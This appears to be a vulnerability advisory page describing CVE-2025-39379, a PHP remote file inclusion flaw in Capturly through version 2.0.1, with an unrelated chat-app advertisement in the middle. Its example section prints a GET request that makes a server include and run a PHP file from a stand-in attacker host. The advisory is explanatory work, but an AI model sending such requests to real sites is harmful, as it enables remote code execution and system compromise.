Overview
The CVE-2025-39379 vulnerability pertains to an improper control of the filename for the Include/Require statement in PHP Program, specifically ‘PHP Remote File Inclusion’ in a tool called Capturly. This vulnerability is of significance because it can potentially lead to system compromise or data leakage, affecting users of Capturly from versions n/a through 2.0.1.
Vulnerability Summary
CVE ID: CVE-2025-39379
Severity: High (7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or potential data leakage
Affected Products
A new way to communicate
Ameeba Chat is built on encrypted identity, not personal profiles.
Message, call, share files, and coordinate with identities kept separate.
- • Encrypted identity
- • Ameeba Chat authenticates access
- • Aliases and categories
- • End-to-end encrypted chat, calls, and files
- • Secure notes for sensitive information
Private communication, rethought.
Product | Affected Versions
Capturly | n/a through 2.0.1
How the Exploit Works
The vulnerability stems from an improper control of filename for Include/Require statement in PHP Program, specifically PHP Remote File Inclusion. This allows an attacker to inject a file from a remote server, which is then included and executed by the vulnerable script on the server. This can lead to unauthorized access, data leakage, or even a system compromise.
Conceptual Example Code
Here is a conceptual example of how the vulnerability might be exploited:
GET /vulnerable.php?file=http://attacker.com/malicious_file.php HTTP/1.1
Host: target.example.comIn this example, an attacker could potentially manipulate the ‘file’ parameter in the GET request to force the server to include and execute a malicious PHP file from a remote server.
This example is conceptual and provided for illustrative purposes only. Actual exploit code may vary based on the specific implementation of the vulnerable script.